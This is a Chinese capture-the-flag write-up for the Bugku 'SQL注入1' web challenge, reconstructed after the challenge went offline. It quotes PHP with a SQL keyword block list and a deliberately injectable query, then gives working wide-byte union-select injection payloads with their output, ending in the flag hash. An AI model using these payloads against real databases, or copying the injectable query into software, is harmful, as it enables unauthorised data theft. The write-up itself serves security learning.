CTF学习之路---bugku WEB篇-SQL注入1(已挂)

SQL注入1(已挂)

因为题目挂了只能还原一下

进入题目
题目要求：

访问参数为：?id=x

查找表为key的数据表，id=1值hash字段值

代码

//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
	if (substr_count($id, $value) > 0)
	{
		exit('包含敏感关键字！'.$value);
	}
}

//xss过滤
$id = strip_tags($id);

$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

当前结果：

id	1
title	title

方法：

利用宽字节即可
拿到题以后，还是老套路，and 1=1和and 1=2 看看是否带入查询，但是这个题目在?id=1和?id=1’两种条件下都不报错，查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf’ union select 1,2%23 来确定回显

?id=1%df%27%20union%20select%201,2%23

Payload和回显的结果

1.?id=1%bf’ union select 1,database()%23查询数据库名称为sql5

id	1
key	fdsafdasfdsa
id	1
key	sql5

2.?id=1%bf’ union select 1,string from sql5.key%23 然后查询key表,id=1的string字段。

id	1
key	fdsafdasfdsa
id	1
key	54f3320dc261f313ba712eb3f13a1f6d
id	1
key	aaaaaaaaaa

得到了flag值 54f3320dc261f313ba712eb3f13a1f6d

得到flag，sql注入中的宽字节注入以及绕过等方面的问题会比较容易些，还是要多学习